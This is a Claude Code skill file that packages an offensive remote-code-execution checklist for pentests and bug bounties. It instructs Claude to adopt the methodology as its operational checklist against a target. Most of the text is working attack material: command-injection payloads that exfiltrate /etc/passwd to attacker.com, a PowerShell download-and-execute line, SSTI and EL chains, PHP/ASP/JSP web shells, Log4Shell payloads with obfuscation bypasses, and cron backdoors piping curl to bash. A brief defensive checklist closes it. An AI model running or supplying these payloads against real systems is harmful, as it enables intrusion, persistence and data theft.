install
source · Clone the upstream repo
git clone https://github.com/ComeOnOliver/skillshub
Claude Code · Install into ~/.claude/skills/
T=$(mktemp -d) && git clone --depth=1 https://github.com/ComeOnOliver/skillshub "$T" && mkdir -p ~/.claude/skills && cp -r "$T/skills/SnailSploit/Claude-Red/offensive-rce" ~/.claude/skills/comeonoliver-skillshub-offensive-rce && rm -rf "$T"
manifest:
skills/SnailSploit/Claude-Red/offensive-rce/SKILL.mdsource content
SKILL: Remote Code Execution
Metadata
- Skill Name: rce
- Folder: offensive-rce
- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/rce.md
Description
Remote Code Execution testing checklist: OS command injection, SSTI-to-RCE, deserialization RCE, file upload RCE, XXE with SSRF to RCE, RCE via dependency confusion, and CVE-based RCE patterns. Use for web app pentests and bug bounty RCE discovery.
Trigger Phrases
Use this skill when the conversation involves any of:
RCE, remote code execution, command injection, OS injection, SSTI RCE, deserialization RCE, file upload RCE, XXE RCE, dependency confusion, code executionInstructions for Claude
When this skill is active:
- Load and apply the full methodology below as your operational checklist
- Follow steps in order unless the user specifies otherwise
- For each technique, consider applicability to the current target/context
- Track which checklist items have been completed
- Suggest next steps based on findings
Full Methodology
Remote Code Execution
occurs when an attacker can execute arbitrary code on a target machine because of a vulnerability or misconfiguration.
Shortcut
- Identify suspicious user input locations. for code injections, take note of every user input location, including URL parameters, HTTP headers, body parameters, and file uploads. to find potential file inclusion vulnerabilities, check for input locations being used to inclusion vulnerabilities, check for input locations being used to determine or, construct filenames and, for file upload functions.
- Submit test payloads to the input locations in order to detect potential vulnerabilities.
- If your requests are blocked, try protection bypass techniques and see if your payload succeeds.
- Finally, confirm the vulnerability by trying to execute harmless commands such as
,whoami
, and,ls
.sleep 5
Mechanisms
Code Injection
This program takes a user input string, pass it through
eval()def calculate(input): return eval("{}".format(input)) result = calculate(user_input.calc) print("The result is {}.".format(result))
an attacker could provide the application with something more malicious instead:
GET /calculator?calc="__import__('os').system('ls')" Host: example.com
File Inclusion
making the target server include a file containing malicious code.
<?php // Some PHP code $file = $_GET["page"]; include $file; // Some PHP code ?>
if the application doesn't limit which file the user includes with the page parameter, an attacker can include a malicious PHP file.
<?PHP system($_GET["cmd"]); ?>
and then they can run commands:
http://example.com/?page=http://attacker.com/malicious.php?cmd=ls
Command Injection
Untrusted data flows into OS command execution APIs.
Examples:
subprocess.run("ping -c 1 " + user, shell=True) # vulnerable subprocess.run(["ping", "-c", "1", user], shell=False) # safer
Detect via time/delay payloads (
&& sleep 5Server-Side Template Injection (SSTI)
User-controlled template strings evaluated by template engines (Jinja2, Twig, Freemarker, Thymeleaf) can lead to RCE.
Probe with arithmetic/concat markers, escalate using engine-specific object graphs. Tools:
tplmapInsecure Deserialization
Deserializing untrusted data (Java, .NET, PHP, Python
pickleTest with known gadget payloads (e.g.,
ysoserialmarshalsecUnsafe YAML and Config Parsers
Loading YAML with object constructors (
yaml.loadsafe_loadFile Upload → Processing Chains
Upload parsers (ImageMagick, ExifTool, video transcoders) may execute/parse complex formats leading to RCE. Test with harmless PoCs and OAST.
Hunt
1. Identify Input Vectors
Map all user-controlled input that could lead to code execution:
- Command-line argument injection: APIs that execute shell commands, CLI tools, system utilities
- Template engines: User-provided templates or template variables (Jinja2, Twig, Freemarker, Thymeleaf, ERB, Handlebars)
- File uploads: Server-side processing of images, documents, archives, media files
- Deserialization endpoints: APIs accepting serialized objects (Java, .NET, Python pickle, PHP serialize, Ruby Marshal)
- Expression Language fields: Search filters, calculations, dynamic queries (SpEL, OGNL, MVEL, EL)
- Webhook URLs: Server-side fetches triggered by user-supplied URLs
- Log file paths: Log injection leading to log processing (LogForge, Log4Shell)
- Configuration files: Upload or modification of config files (.htaccess, web.config, cron jobs)
- Email/document processing: Mail parsers, PDF generators, office document converters
- Image manipulation: ImageMagick, GraphicsMagick, Pillow, GD library operations
- Video/audio processing: FFmpeg, ExifTool, media transcoders
2. Test Payloads by Context
Command Injection Payloads
Linux/Unix:
# Basic injection ; whoami | whoami || whoami & whoami && whoami `whoami` $(whoami) # Time-based detection ; sleep 10 | sleep 10 & || ping -c 10 127.0.0.1 # Out-of-band (OAST) ; nslookup $(whoami).attacker.com ; curl http://attacker.com/$(whoami) ; wget http://attacker.com/?data=$(cat /etc/passwd | base64) # Space bypasses cat</etc/passwd {cat,/etc/passwd} cat$IFS/etc/passwd cat${IFS}/etc/passwd X=$'cat\x20/etc/passwd'&&$X # Command obfuscation c''at /etc/passwd c\at /etc/passwd c"a"t /etc/passwd $(echo Y2F0IC9ldGMvcGFzc3dk | base64 -d) # Wildcard injection /???/??t /???/??ss?? /???/n? 127.0.0.1 # Variable expansion a=w;b=hoami;$a$b
Windows:
# Basic injection & whoami && whoami | whoami || whoami ; whoami # Newline injection %0a whoami # Time-based | ping -n 10 127.0.0.1 & timeout /t 10 # OAST & nslookup %USERNAME%.attacker.com & certutil -urlcache -split -f http://attacker.com/beacon # PowerShell execution & powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"
Server-Side Template Injection (SSTI) Payloads
Jinja2 (Python - Flask, Ansible):
# Detection {{7*7}} # Returns 49 {{7*'7'}} # Returns 7777777 # Reconnaissance {{config}} {{config.items()}} {{self}} {%debug%} # RCE via __subclasses__ {{''.__class__.__mro__[1].__subclasses__()}} # Find useful classes {{''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__['sys'].modules['os'].popen('whoami').read()}} # subprocess.Popen {{''.__class__.__mro__[1].__subclasses__()[396]('whoami',shell=True,stdout=-1).communicate()}} # Modern bypass (Python 3) {{request.application.__globals__.__builtins__.__import__('os').popen('whoami').read()}} # Lipsum object abuse {{lipsum.__globals__['os'].popen('whoami').read()}} # Cycler object {{cycler.__init__.__globals__.os.popen('whoami').read()}}
Twig (PHP - Symfony):
# Detection {{7*7}} # RCE {{_self.env.registerUndefinedFilterCallback("exec")}} {{_self.env.getFilter("whoami")}} # Alternative {{_self.env.enableDebug()}} {{_self.env.isDebug()}} # PHP filter chain (modern) {{["id"]|filter("system")}}
Freemarker (Java):
# Detection ${7*7} # RCE <#assign ex="freemarker.template.utility.Execute"?new()> ${ex("whoami")} # Alternative <#assign classLoader=object?api.class.protectionDomain.classLoader> <#assign clazz=classLoader.loadClass("java.lang.Runtime")> <#assign method=clazz.getMethod("getRuntime",null)> <#assign runtime=method.invoke(null,null)> <#assign method=clazz.getMethod("exec",classLoader.loadClass("java.lang.String"))> ${method.invoke(runtime,"whoami")}
Thymeleaf (Java - Spring):
# Detection [[${7*7}]] # RCE ${T(java.lang.Runtime).getRuntime().exec('whoami')} [[${T(java.lang.Runtime).getRuntime().exec('whoami')}]] # Spring EL alternative ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('whoami').getInputStream())}
ERB (Ruby - Rails):
# Detection <%= 7*7 %> # RCE <%= system("whoami") %> <%= `whoami` %> <%= IO.popen('whoami').readlines() %> <%= %x(whoami) %>
Velocity (Java):
# Detection #set($x = 7 * 7)$x # RCE #set($rt = $class.forName("java.lang.Runtime")) #set($chr = $class.forName("java.lang.Character")) #set($str = $class.forName("java.lang.String")) #set($ex=$rt.getRuntime().exec("whoami")) $ex.waitFor() #set($out=$ex.getInputStream()) #foreach($i in [1..$out.available()]) $chr.toString($out.read()) #end
Handlebars (JavaScript/Node.js):
# Detection {{7*7}} # RCE (if helper is vulnerable) {{#with "s" as |string|}} {{#with "e"}} {{#with split as |conslist|}} {{this.pop}} {{this.push (lookup string.sub "constructor")}} {{this.pop}} {{#with string.split as |codelist|}} {{this.pop}} {{this.push "return require('child_process').execSync('whoami');"}} {{this.pop}} {{#each conslist}} {{#with (string.sub.apply 0 codelist)}} {{this}} {{/with}} {{/each}} {{/with}} {{/with}} {{/with}} {{/with}}
Expression Language (EL) Injection
Spring SpEL (Spring Framework):
# Detection ${7*7} #{7*7} # RCE ${T(java.lang.Runtime).getRuntime().exec('whoami')} #{T(java.lang.Runtime).getRuntime().exec('whoami')} # Alternative methods ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('whoami').getInputStream())} # Bypass blacklist ${T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("ex"+"ec",T(String[])).invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("getRu"+"ntime").invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime")),new String[]{"whoami"})}
OGNL (Object-Graph Navigation Language - Struts):
# Detection ${7*7} # RCE ${@java.lang.Runtime@getRuntime().exec('whoami')} # CVE-2017-5638 (Content-Type exploitation) Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
MVEL (MVFLEX Expression Language):
# Detection ${7*7} # RCE Runtime.getRuntime().exec("whoami");
Deserialization Payloads
Java (using ysoserial):
# Generate payload java -jar ysoserial.jar CommonsCollections6 'curl http://attacker.com/beacon' | base64 # Popular gadget chains ysoserial CommonsCollections1 ysoserial CommonsCollections6 ysoserial CommonsCollections7 ysoserial Spring1 ysoserial Spring2 ysoserial Jdk7u21 ysoserial Hibernate1
.NET (using ysoserial.net):
# Generate payload ysoserial.exe -g ObjectDataProvider -f Json -c "calc.exe" ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "powershell.exe -c whoami" # Gadgets TypeConfuseDelegate ObjectDataProvider PSObject WindowsIdentity
Python pickle:
import pickle import base64 import os class RCE: def __reduce__(self): return (os.system, ('whoami',)) payload = pickle.dumps(RCE()) print(base64.b64encode(payload))
PHP serialize:
# Magic methods for exploitation __wakeup() __destruct() __toString() # Example payload O:8:"stdClass":1:{s:4:"file";s:17:"/etc/passwd";}
3. Advanced Techniques
Blind RCE Detection
Time-Based:
# Linux ; sleep 10 | ping -c 10 127.0.0.1 | timeout 10 # Windows | ping -n 10 127.0.0.1 & timeout /t 10
Out-of-Band (OAST) using Burp Collaborator:
# DNS exfiltration ; nslookup $(whoami).burpcollaborator.net ; dig $(whoami).burpcollaborator.net # HTTP callback ; curl http://burpcollaborator.net ; wget http://burpcollaborator.net/$(whoami) # DNS with data exfiltration ; cat /etc/passwd | base64 | xargs -I {} nslookup {}.burpcollaborator.net
Bypass Techniques
Blacklist Bypasses:
# Case variation WhOaMi wH%6f%61%6Di # Encoding wh\u006fami wh\x6fami echo "d2hvYW1p" | base64 -d | sh # Line continuation wh\ oami # Comments (bash) wh#comment oami # Null byte (legacy) whoami%00.jpg
WAF Bypasses:
# Unicode/encoding wh\u006fami # Hex encoding \x77\x68\x6f\x61\x6d\x69 # Concatenation 'wh'+'oami' "wh"+"oami" # Variable expansion a=w;b=hoami;$a$b
4. Confirm the Vulnerability
Execute harmless commands to prove RCE without causing damage:
# Safe verification commands whoami id pwd hostname uname -a cat /etc/issue systeminfo (Windows) # Create proof file echo "pwned_by_researcher" > /tmp/proof.txt # Time-based confirmation sleep 10 && curl http://attacker.com/confirmed
Practical Tactics:
- Use time-based payloads for blind cases; confirm via differential latency (baseline vs payload response time)
- Use OAST (Burp Collaborator, Interactsh) to detect out-of-band DNS/HTTP callbacks
- For deserialization, try signed/unsigned object tampering and gadget canaries
- For uploads, verify server-side processing paths (thumbnails, metadata extraction, AV scanning windows)
- Test multiple injection points in parallel; backend queue processing may delay execution
- Monitor server-side logs if accessible (error logs often reveal stack traces)
Vulnerabilities
File Upload → RCE Chains
1. Web Shell Upload
PHP Web Shells:
# Minimal shell <?php system($_GET['c']); ?> # Bypass extension filters shell.php.jpg shell.php%00.jpg # Null byte (PHP <5.3) shell.php%0a.jpg # Newline shell.php..... # Multiple dots shell.pHp # Case variation shell.php%20 # Trailing space shell.php::$DATA # Windows NTFS ADS shell.php/ # Trailing slash (IIS) # Content-Type manipulation Content-Type: image/jpeg Content-Disposition: form-data; name="file"; filename="shell.php.jpg" # Polyglot files (valid image + PHP) GIF89a<?php system($_GET['c']); ?>
ASP/ASPX Shells:
<%@ Page Language="C#" %> <%@ Import Namespace="System.Diagnostics" %> <% Process.Start("cmd.exe", "/c " + Request["c"]); %>
JSP Shells:
<% Runtime.getRuntime().exec(request.getParameter("c")); %>
2. .htaccess / web.config Injection
.htaccess to enable PHP in images:
AddType application/x-httpd-php .jpg AddHandler application/x-httpd-php .jpg # Alternative <FilesMatch "\.jpg$"> SetHandler application/x-httpd-php </FilesMatch>
web.config to enable ASP in images:
<configuration> <system.webServer> <handlers> <add name="jpg" path="*.jpg" verb="*" type="System.Web.UI.PageHandlerFactory" /> </handlers> </system.webServer> </configuration>
3. Archive Extraction (Zip Slip - CVE-2018-1002200)
# Create malicious zip with path traversal ln -s ../../../../../../../etc/cron.d/evil evil.txt zip --symlinks evil.zip evil.txt # Or craft manually with path traversal evil/ ../../../../var/www/html/shell.php ../../../../etc/cron.d/backdoor
Testing:
- Upload zip/tar containing paths with
../ - Symlink to sensitive locations
- Overwrite cron jobs, SSH keys, web roots
4. ImageMagick Exploits
ImageTragick (CVE-2016-3714):
push graphic-context viewbox 0 0 640 480 fill 'url(https://attacker.com/shell.jpg"|whoami")' pop graphic-context
Modern ImageMagick RCE (CVE-2022-44268):
# Arbitrary file read convert -size 1x1 xc:red -set "profile:1" "/etc/passwd" exploit.png # Exploitation convert exploit.png output.png identify -verbose output.png | grep "Raw profile type"
Other ImageMagick vectors:
- MSL (Magick Scripting Language) injection
- Label injection for RCE
- SVG with embedded scripts
5. PDF Processing RCE
PDF with JavaScript:
app.alert({ cMsg: "XSS", cTitle: "XSS" }); // File system access (if enabled) this.exportDataObject({ cName: "test", nLaunch: 2 });
LaTeX Injection:
\documentclass{article} \immediate\write18{whoami} \begin{document} Hello World \end{document} # Alternative \input{|"whoami"}
XSL-FO Injection (Apache FOP):
<fo:instream-foreign-object> <svg:svg> <svg:script>java.lang.Runtime.getRuntime().exec("whoami")</svg:script> </svg:svg> </fo:instream-foreign-object>
6. Office Document Processing
XXE in DOCX/XLSX:
# Extract document1.xml from DOCX <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <document>&xxe;</document>
Macro-enabled Documents:
- DOCM, XLSM, PPTM files with VBA macros
- Excel 4.0 macros (XLM) bypass modern protections
- DDE (Dynamic Data Exchange) injection
LibreOffice/OpenOffice Exploits:
- CVE-2023-2255: Remote code execution via crafted documents
- Python macro execution in LibreOffice
Log4Shell (CVE-2021-44228)
Basic Payloads:
${jndi:ldap://attacker.com/a} ${jndi:rmi://attacker.com/a} ${jndi:dns://attacker.com/a} # Common injection points User-Agent: ${jndi:ldap://attacker.com/a} X-Api-Version: ${jndi:ldap://attacker.com/a} Referer: ${jndi:ldap://attacker.com/a}
Obfuscation Bypasses:
# Lowercase/uppercase ${${lower:j}ndi:ldap://attacker.com/a} ${${upper:j}ndi:ldap://attacker.com/a} # Environment variables ${j${env:NOTHING:-n}di:ldap://attacker.com/a} # Nested lookups ${jnd${sys:java.version:-i}:ldap://attacker.com/a} # Multiple levels ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker.com/a}
Setup LDAP server for exploitation:
# Using marshalsec java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://attacker.com/#Exploit" 1389 # Exploit.java - compile and host public class Exploit { static { try { Runtime.getRuntime().exec("curl http://attacker.com/pwned"); } catch (Exception e) {} } }
Prototype Pollution → RCE (Node.js)
Pollute Object prototype:
// Via JSON {"__proto__": {"isAdmin": true}} {"constructor": {"prototype": {"isAdmin": true}}} // Via query parameters ?__proto__[isAdmin]=true ?constructor[prototype][isAdmin]=true
Escalate to RCE:
// Pollute child_process options { "__proto__": { "shell": "/bin/sh", "argv0": "console.log(require('child_process').execSync('whoami').toString())//" } } // Pollute via NODE_OPTIONS {"__proto__": {"NODE_OPTIONS": "--require /tmp/malicious.js"}} // CVE-2022-21824 - Prototype pollution in VM module
FFmpeg / ExifTool Exploits
FFmpeg SSRF (CVE-2016-1897, CVE-2016-1898):
# Playlist SSRF concat:http://attacker.com/playlist|file:///etc/passwd # HLS SSRF #EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, http://internal.server/admin
ExifTool RCE (CVE-2021-22204):
# Create malicious image with DjVu exploit exiftool -config exploit.config '-HasselbladExif<=exploit.jpg' malicious.jpg
SQL Injection → RCE
MySQL:
-- Write web shell SELECT '<?php system($_GET["c"]); ?>' INTO OUTFILE '/var/www/html/shell.php'; -- Read file LOAD_FILE('/etc/passwd'); -- UDF exploitation CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so'; SELECT sys_exec('whoami');
PostgreSQL:
-- COPY TO PROGRAM (9.3+) COPY (SELECT '') TO PROGRAM 'curl http://attacker.com/beacon'; -- Large Object + lo_export SELECT lo_create(-1); INSERT INTO pg_largeobject VALUES (-1, 0, decode('<?php system($_GET["c"]); ?>', 'base64')); SELECT lo_export(-1, '/var/www/html/shell.php');
MSSQL:
-- xp_cmdshell EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'whoami'; -- OLE Automation EXEC sp_OACreate 'WScript.Shell', @shell OUTPUT; EXEC sp_OAMethod @shell, 'Run', NULL, 'cmd /c whoami';
Container Escape → RCE
Docker Socket Exposure:
# If /var/run/docker.sock is mounted docker -H unix:///var/run/docker.sock run -v /:/host -it alpine chroot /host sh
Privileged Container:
# From privileged container mkdir /tmp/exploit mount /dev/sda1 /tmp/exploit chroot /tmp/exploit sh
Kernel Exploits:
- Dirty COW (CVE-2016-5195)
- DirtyPipe (CVE-2022-0847)
- DirtyCred (CVE-2022-2588)
Chaining and Escalation
1. Path Traversal → RCE
# Overwrite SSH authorized_keys PUT /upload?path=../../.ssh/authorized_keys # Overwrite cron job PUT /upload?path=../../etc/cron.d/backdoor Content: * * * * * root curl http://attacker.com/shell.sh | bash # Overwrite bash profile PUT /upload?path=../../.bashrc # Overwrite PHP auto-prepend PUT /upload?path=../../.user.ini Content: auto_prepend_file=/tmp/shell.php
2. SSRF → RCE
# SSRF to cloud metadata → IAM creds http://169.254.169.254/latest/meta-data/iam/security-credentials/ # SSRF to internal admin → RCE http://internal:8080/admin/exec?cmd=whoami # SSRF to Redis → cron job http://localhost:6379 CONFIG SET dir /etc/cron.d/ CONFIG SET dbfilename root SET 1 "* * * * * root curl http://attacker.com/shell.sh | bash" SAVE
3. XXE → RCE
# XXE + PHP expect wrapper <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "expect://whoami"> ]> <root>&xxe;</root> # XXE + JAR protocol (Java) <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "jar:http://attacker.com/malicious.jar!/payload.class"> ]>
4. SSTI → File Write → RCE
# Jinja2 write web shell {{''.__class__.__mro__[1].__subclasses__()[40]('/var/www/html/shell.php','w').write('<?php system($_GET["c"]); ?>')}}
Real-World CVEs and Cases
Critical RCE Vulnerabilities
-
CVE-2021-44228 - Log4Shell (Apache Log4j):
- JNDI injection in logging library
- Affected: Minecraft, VMware, Cisco, countless others
- Impact: Unauthenticated RCE on millions of systems
-
CVE-2022-22965 - Spring4Shell (Spring Framework):
- Class loader manipulation via property binding
- Impact: RCE on Spring MVC applications
-
CVE-2021-3129 - Laravel Debug Mode RCE:
- Ignition debug page deserialization
- Impact: Unauthenticated RCE on Laravel apps with debug enabled
-
CVE-2019-0193 - Apache Solr RCE:
- Velocity template injection
- Impact: Unauthenticated RCE on Solr instances
-
CVE-2017-5638 - Apache Struts2 RCE:
- OGNL injection via Content-Type header
- Impact: Led to Equifax breach affecting 147M people
-
CVE-2020-1938 - Ghostcat (Apache Tomcat):
- AJP protocol file read/inclusion
- Impact: RCE via arbitrary file write
-
CVE-2022-26134 - Confluence RCE:
- OGNL injection in Confluence Server/Data Center
- Impact: Unauthenticated RCE
-
CVE-2018-1002200 - Kubernetes Arbitrary File Overwrite (Zip Slip):
- Path traversal in tar/zip extraction
- Impact: Container escape via kubectl cp
-
CVE-2016-3714 - ImageTragick (ImageMagick):
- Command injection via image processing
- Impact: RCE on image upload features
-
CVE-2021-22204 - ExifTool RCE:
- DjVu metadata command injection
- Impact: RCE via image metadata parsing
Impact Categories
- Critical: Unauthenticated RCE on internet-facing services
- High: Authenticated RCE or unauthenticated RCE requiring interaction
- Medium: RCE requiring specific configuration or low-privilege authentication
- Low: RCE requiring admin access or highly specific conditions
Remediation Recommendations
Avoid inserting user input into code that gets evaluated. Also treat user uploaded files as untrusted, and avoid including file based on user input.
Defensive Checklist
- Eliminate Dangerous Functions: Remove
,eval
,exec
,Function
,subprocess.shell=True
where possibleRuntime.exec() - Parameterized Execution: Use parameterized/array-based process execution (
); escape+allowlist argumentsshell=False - Template Engine Hardening: Disable dangerous functions/tags; enable sandbox mode; don't accept user templates
- Strict Upload Validation:
- Enforce content-type AND extension checks
- Verify via magic bytes (file signature)
- Re-encode/process files (strip metadata with exiftool -all=)
- Store uploads outside web root
- Sandbox File Processing:
- Process uploads in isolated containers/VMs
- Use seccomp, AppArmor, SELinux restrictions
- Run as non-root with minimal permissions
- No network access during processing
- Delay publish until validation completes
- Safe Deserialization:
- Prefer JSON/XML with strict schemas
- Sign and verify serialized data
- Avoid
,pickle
, native object graphsmarshal - Use allowlists for permitted classes
- Dependency Management:
- Keep libraries updated (ImageMagick, ExifTool, FFmpeg, Log4j, etc.)
- Pin versions and audit dependencies
- Subscribe to security advisories
- Use tools:
,npm audit
,pip-auditOWASP Dependency-Check
- Network Segmentation:
- Implement egress filtering to prevent OAST callbacks
- Restrict outbound connections from app servers
- Monitor DNS queries for suspicious patterns
- WAF/RASP:
- Deploy Web Application Firewall with RCE signatures
- Consider Runtime Application Self-Protection (RASP)
- Log and alert on suspicious payloads
- Log4Shell Specific:
- Update to Log4j 2.17.1+
- Set
log4j2.formatMsgNoLookups=true - Remove JndiLookup class from classpath
- Monitor for obfuscated JNDI patterns
Testing Tools
- SSTI:
,tplmapSSTImap - Deserialization:
,ysoserial
,ysoserial.netmarshalsec - Command Injection: Burp Intruder,
commix - General: Burp ActiveScan,
templates,nuclei
signaturesjaeles - OAST: Burp Collaborator, Interactsh, canarytokens.org